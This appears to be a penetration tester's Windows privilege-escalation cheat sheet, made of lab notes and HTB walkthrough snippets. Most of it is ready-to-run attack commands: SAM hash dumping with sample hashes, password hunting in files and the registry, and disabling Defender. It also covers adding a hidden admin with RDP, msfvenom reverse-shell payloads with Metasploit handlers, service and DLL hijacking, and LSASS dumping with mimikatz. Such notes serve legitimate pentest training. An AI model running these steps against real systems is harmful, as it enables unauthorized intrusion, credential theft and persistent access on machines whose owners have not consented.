Windows Privlage Escalation

Windows Privlage Escalation

Resources

HackTricks Fuzzy security

Windows 10 Exploits:

  • https://github.com/nu11secur1ty/Windows10Exploits

Low Hanging Fruit

Reference

whoami /priv 
SeImpersonatePrivilege -> PrintSpoofer, Juicy Potato, Rogue Potato, Hot Potato
SeAssignPrimaryTokenPrivilege -> Juicy Potato 
SeTakeOwnershipPrivilege ->  become the owner of any object and modify the DACL to grant access.  
SeBackup-> can create copy of sam system and run impacket script to dump hashes


If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato
If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato
  • Check the current tokens you have and any ability to escalate from your tokens

  • https://github.com/gtworek/Priv2Admin
    https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation

SeBackupPrivilege

getprivs

Privilege Information for cicada.htb.exe (PID: 3848)
----------------------------------------------------

Process Integrity Level: High

Name                          	Description                    	Attributes
====                          	===========                    	==========
SeBackupPrivilege             	Back up files and directories  	Enabled, Enabled by Default
SeRestorePrivilege            	Restore files and directories  	Enabled, Enabled by Default
SeShutdownPrivilege           	Shut down the system           	Enabled, Enabled by Default
SeChangeNotifyPrivilege       	Bypass traverse checking       	Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege 	Increase a process working set 	Enabled, Enabled by Default
  • backup the registry hives

cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"
cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"
  • download files and then use impacket secretsdump.py

python3 /opt/impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Search for files with passwords in them

  • Perform a basic search

#in one shot, may take a while
findstr /SI /M "password" *.xml *.ini *.txt  
#seperate commands
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

dir c:\*password* /s
dir c:\*pass* /s
dir c:\*login* /s
dir c:\*finance* /s
dir c:\*.key /s
dir c:\*.ica /s
dir c:\*.pwd* /s
dir c:\*.config* /s
dir c:\*access* /s

# Powershell finds 
Get-ChildItem -Path "C:\Users" -Filter *.doc -Recurse
Get-ChildItem -Path "C:\Users" -Filter *.xlxs -Recurse
Get-ChildItem -Path "C:\Users" -Filter *.xls -Recurse
  • Find strings in .config files

dir /s *pass* == *cred** == *vnc* == *.config*
  • Find all passwords in all files

findstr /spin "password" *.*

Unattended Setup

  • Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode."

  • Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode." It is also where users passwords are stored in base64. Navigate to:

  • Password files that could have base64 encoded credentials

Unattended files
dir C:\Windows\sysprep\sysprep.xml
dir C:\Windows\sysprep\sysprep.inf
dir C:\Windows\sysprep.inf
dir C:\Windows\Panther\Unattended.xml
dir C:\Windows\Panther\Unattend.xml
dir C:\Windows\Panther\Unattend\Unattend.xml
dir C:\Windows\Panther\Unattend\Unattended.xml
dir C:\Windows\System32\Sysprep\unattend.xml
dir C:\Windows\System32\Sysprep\unattended.xml
dir C:\unattend.txt
dir C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

dir C:\*.vnc.ini /s /b
dir C:\*ultravnc.ini /s /b
dir C:\ /s /b | findstr /si *vnc.ini

Search Registry for Passwords

reg query HKLM /f password /t REG_SZ /s      #admin needed
reg query HKCU /f password /t REG_SZ /s

Powershell

powershell.exe -nop -ep bypass    
Get-ExecutionPolicy    
Set-ExecutionPolicy Unrestricted   
Set-MpPreference -DisableRealtimeMonitoring $true   
  • Powershell history

  • Windows powershell saves all previous commands into a file called ConsoleHost_history.txt This is located at:

dir %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Windows Kernel Versions

  • systeminfo

Kernel 6.1 - Windows 7 / Windows Server 2008 R2  
Kernel 6.2 - Windows 8 / Windows Server 2012  
Kernel 6.3 - Windows 8.1 / Windows Server 2012 R2  
Kernel 10 - Windows 10 / Windows Server 2016 / Windows Server 2019 / Windows 11 / Windows Server 2022

Important Files

dir %SYSTEMROOT%\System32\drivers\etc\hosts                   #local DNS entries 
dir %SYSTEMROOT%\System32\drivers\etc\networks                #network config
dir %SYSTEMROOT%\Prefetch                                     #prefetch dir, exe logs
dir %WINDIR%\system32\config\AppEvent.Evt                     #application logs
dir %WINDIR%\system32\config\SecEvent.Evt                     #security logs

Scripts

You might want to check for AV first! Scripts Reference

winPEAS Other compiled binaries nishang JAWS PowerSploit PrivEscCheck Windows Exploit Suggester (Next-Generation) Sherlock Priv2Admin OS privileges to system

Compiled scripts here

Run PowerUp

. .\PowerUp.ps1
Invoke-AllChecks

Kernel Exploits

  • https://github.com/SecWiki/windows-kernel-exploits

Admin Service that a Standard User can run

  • https://www.youtube.com/watch?v=3BQKpPNlTSo

Run Executable in Background

start /B program

Disable/Enable Group Policy

  • Disable:

REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f
  • enable

REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /0 REG_DWORD /d 1 /f

Add Admin and Enable RDP

Add Admin & Enable RDP
net user /add hacked Password1
net localgroup administrators hacked /add
net localgroup Administrateurs hacked /add (For French target)
net localgroup "Remote Desktop Users" hacked /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service type = REMOTEDESKTOP mode = ENABLE scope = CUSTOM addresses = 10.0.0.1

SMB File Transfer

  • On kali box:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
  • On Windows (update the IP address with your Kali IP):

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe

xfreerdp

xfreerdp /v:10.10.25.227 /u:Wade /p:parzival /cert:ignore /drive:/usr/share/windows-resources,share /dynamic-resolution
proxychains -f proxy9051.conf xfreerdp +clipboard /v:10.10.120.5 /d:RLAB /u:'SQL01$' /pth:47b071ssddff02d0f06770137996c /sec:nla /cert:ignore /drive:/home/kali/Documents/htb/rasta/map,share

Credit

  • Taken from Tib3rius

Basic Enumeration

  • Find out the users on the box and enumerate their privlages

net users
net users Administrator

Registry Escalation - Autoruns

  • Detection

  • Open command prompt and type:

C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
  • In Autoruns, click on the Logon tab.

  • From the listed results, notice that the “My Program” entry is pointing to

C:\Program Files\Autorun Program\program.exe
  • In command prompt type:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
  • From the output, notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the "program.exe" file.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/x64/shell/reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe

  • Copy the generated file, program.exe, to the Windows VM.

  • Windows VM

  • Place program.exe in C:\Program Files\Autorun Program

  • To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

  • Kali VM

  • Wait for a new session to open in Metasploit.

  • In Metasploit (msf > prompt) type: sessions -i [Session ID]

  • To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Registry Escalation AlwaysInstallElevated

  • Detection

  • Windows VM

  • Open command prompt and type:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
  • From the output, notice that AlwaysInstallElevated value is 1.

  • In command prompt type:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  • From the output, notice that AlwaysInstallElevated value is 1.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/shell_reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
  • Copy the generated file, setup.msi, to the Windows VM.

Windows VM

  • Place setup.msi in C:\Temp.

  • Open command prompt and type:

msiexec /quiet /qn /i C:\Temp\setup.msi

Service Escalation via Changing binpath

  • Query the interesting service

sc.exe qc IObitUnSvr
SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : 
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem
  • You notice that you cannot swap out the legit exe, or modify the directory the exe is in, however you can edit the binpath

sc.exe config IObitUnSvr binPath= "C:\Users\dharding\Desktop\sliver.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Windows\System32\spool\drivers\color> sc.exe start IObitUnSvr
sc.exe start IObitUnSvr
# get session
[*] Session 12b37889 dante-dc01 - 10.10.14.2:52042 (LOCAL-WS02) - windows/amd64 - Tue, 07 May 2024 18:18:15 EDT

Startup Applications

  • Detection

  • Windows VM

  • Open command prompt and type: icacls.exe

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • From the output notice that the BUILTIN\Users group has full access (F) to the directory.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/shell_reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open another command prompt and type: msfvenom -p windows/shell_reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe

  • Copy the generated file, x.exe, to the Windows VM.

  • Windows VM

  • Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

  • Logoff.

  • Login with the administrator account credentials.

  • Kali VM

  • Wait for a session to be created, it may take a few seconds.

  • In Meterpreter(meterpreter > prompt) type: getuid or whoami

  • From the output, notice the user is User-PC\Admin

DLL Hijacking

  • Detection

  • Windows VM

  • Open the Tools folder that is located on the desktop and then go the Process Monitor folder.

  • In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time.

  • Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select Run as administrator from the menu.

  • In procmon, select filter. From the left-most drop down menu, select Process Name.

  • In the input box on the same line type: dllhijackservice.exe

  • Make sure the line reads Process Name is dllhijackservice.exe then Include and click on the Add button, then Apply and lastly on OK.

  • Next, select from the left-most drop down menu Result.

  • In the input box on the same line type: NAME NOT FOUND

  • Make sure the line reads Result is NAME NOT FOUND then Include and click on the Add button, then Apply and lastly on OK.

  • Open command prompt and type:

sc start dllsvc
  • Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute C:\Temp\hijackme.dll yet it could not do that as the file was not found. Note that C:\Temp is a writable location.

  • Exploitation

  • Windows VM

  • Copy C:\Users\User\Desktop\Tools\Source\windows_dll.c to the Kali VM.

  • Kali VM

  • Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add

  • Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

  • Copy the generated file hijackme.dll, to the Windows VM.

  • Windows VM

  • Place hijackme.dll in C:\Temp.

  • Open command prompt and type: sc stop dllsvc & sc start dllsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:

net localgroup administrators

Service Escalation binPath

  • Detection

  • Windows VM

  • Open command prompt and type:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
  • Notice that the output suggests that the user User-PC\User has the SERVICE_CHANGE_CONFIG permission.

  • Exploitation

  • Windows VM

  • In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"

  • In command prompt type: sc start daclsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Unquoted Service Path

  • Find vulnerable services with this command without PowerUp

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
  • Open command prompt and type: sc qc unquotedsvc

  • Notice that the BINARY_PATH_NAME field displays a path that is not confined between quotes.

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

  • Copy the generated file, common.exe, to the Windows VM.

  • Windows VM

  • Place common.exe in "C:\Program Files\Unquoted Path Service".

  • Open command prompt and type: sc start unquotedsvc

  • It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Hot Potato

  • Exploitation

  • Windows VM

  • In command prompt type: powershell.exe -nop -ep bypass

  • In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

  • In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

  • To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators

Password Mining Escalation Configuration Files

  • Exploitation

  • Windows VM

  • Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml

  • Scroll down to the "<Password>" property and copy the base64 string that is confined between the "<Value>" tags underneath it.

  • Kali VM

  • In a terminal, type: echo [copied base64] | base64 -d

  • Notice the cleartext password

Password Mining Escalation Memory

  • Exploitation

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic

  • In Metasploit (msf > prompt) type: set uripath x

  • In Metasploit (msf > prompt) type: run

  • Windows VM

  • Open Internet Explorer and browse to: http://[Kali VM IP Address]/x

  • Open command prompt and type: taskmgr

  • In Windows Task Manager, right-click on the iexplore.exe in the Image Name columnand select Create Dump File from the popup menu.

  • Copy the generated file, iexplore.DMP, to the Kali VM.

  • Kali VM

  • Place iexplore.DMP on the desktop.

  • Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

  • Select the Copy the Base64 encoded string.

  • In command prompt type: echo -ne [Base64 String] | base64 -d

  • Notice the credentials in the output.

Kernal Exploits

  • Establish a shell

  • Kali VM

  • Open command prompt and type: msfconsole

  • In Metasploit (msf > prompt) type: use multi/handler

  • In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

  • In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

  • In Metasploit (msf > prompt) type: run

  • Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe

  • Copy the generated file, shell.exe, to the Windows VM.

  • Windows VM

  • Execute shell.exe and obtain reverse shell

  • Detection & Exploitation

  • Kali VM

  • In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester

  • Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation

  • In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif

  • In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]

  • In Metasploit (msf > prompt) type: set LPORT 5555

  • In Metasploit (msf > prompt) type: run

LSASS Credential Dumping

  • use procdump

procdump.exe -accepteula -ma lsass.exe C:\Users\Administrator\Desktop\lsass.dmp
#either exfil or perform locally 
mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonpasswords

Last updated